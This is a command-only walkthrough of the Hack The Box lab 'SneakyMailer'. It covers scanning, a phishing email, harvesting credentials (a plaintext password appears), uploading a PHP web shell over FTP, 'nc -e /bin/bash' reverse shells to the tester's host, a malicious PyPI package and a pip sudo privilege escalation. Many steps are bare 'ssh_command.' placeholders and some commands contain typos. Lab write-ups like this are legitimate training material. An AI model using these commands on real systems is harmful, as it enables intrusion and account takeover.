Cu3rv0x
SneakyMailer

SneakyMailer


HTB Linux

nmap -A -p- -oA output 10.129.2.28 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA sneakymailer 10.129.2.28

nmap -sU -O -p- -oA sneakymailer-udp 10.129.2.28

nikto -h 10.129.2.28:80

ssh_command.

ssh_command.

echo “10.129.2.28 sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb” | sudo tee -a /etc/hosts

ssh_command.

curl -s -X GET “http://sneakycorp.htb/team.php” | html2text | grep “sneakymailer.htb” |awk ‘NF{print $NF}’ >users

ssh_command.

cat users | tr ‘\n’ ’,’

swaks —from “cu3rv0x@sneakycorp.htb” —to “tigernixon@sneakymailer.htb…” —header “Subject: README” —body “Da click http://10.10.14.120/test” —server 10.129.2.28

ssh_command.

sudo python3 -m htt.server 80

ssh_command.

Vemos informacion de paul

ssh_command.

php —interactive

echo ulrdecode(“1

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt”)

Credenciales-> paulbyrd:^(#J@SkFv2[%KhIxKk(Ju’hqcHl<:Ht

ssh_command.

a1 OK LOGIN

a2 OK LIST completed

a3 EXAMINE “INBOX”

a4 EXAMINE “INBOX.Trash”

a5 EXAMINE “INBOX.Sent”

ssh_command.

a6 EXMAMINE “INBOX.Deleted Items”

a7 EXAMINE “INBOX.Sent Items”

ssh_command.

a10 OK FETCH

ssh_command.

a11 FETCH 2 body[]

ssh_command.

cat credentials.txt

ssh_command.

wfuzz -c —hh=185 -t 200 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H “Host: FUZZ.sneakycorp.htb” http://sneakycorp.htb

ssh_command.

http://dev.sneakycorp.htb

ssh_command.

ftp 10.129.2.28

paulbyrd:^(#J@SkFv2[%KhIxKk(Ju’hqcHl<:Ht

pust cu3rv0x.php

ssh_command.

ssh_command.

http://dev.sneaky.corp.htb/cu3rvox.php?cmd=whoami

ssh_command.

http://dev.sneaky.corp.htb/cu3rvox.php?cmd=nc -e /bin/bash 10.10.14.120 443

ssh_command.

nc -lvnp 443

ssh_command.

uname -a

lsb_release -a

find -perm -4000 2>/dev/null

ssh_command.

ls -al

cat .htpasswd

john —wordlist=/usr/share/worldlists/rockyou.txt hash

soufianeelhaoui

ssh_command.

cat /etc/ngnix/sites-available/pypi

ssh_command.

ps -faux |grep “pypi”

ssh_command.

http://pypi.sneakycorp.htb:8080

ssh_command.

mkdir reverse

cd reverse

touch reverse/init.py

mkdir reverse

touch reverse/init.py

tree

ssh_command.

ssh_command.

cat setup.py

ssh_command.

cat ~/.pypirc

ssh_command.

python setup.py sdist upload -r reverse

sudo nc -lvnp 443

ssh_command.

sudo -l

ssh_command.

https://gtfobins.github.io/gtfobins/pip/

TF=$(mktemp -d) echo “import os; os.execl(‘/bin/sh’, ‘sh’, ‘-c’, ‘sh <$(tty) >$(tty) 2>$(tty)’)” > $TF/setup.py sudo pip install $TF

ssh_command.

© 2025 Cu3rv0x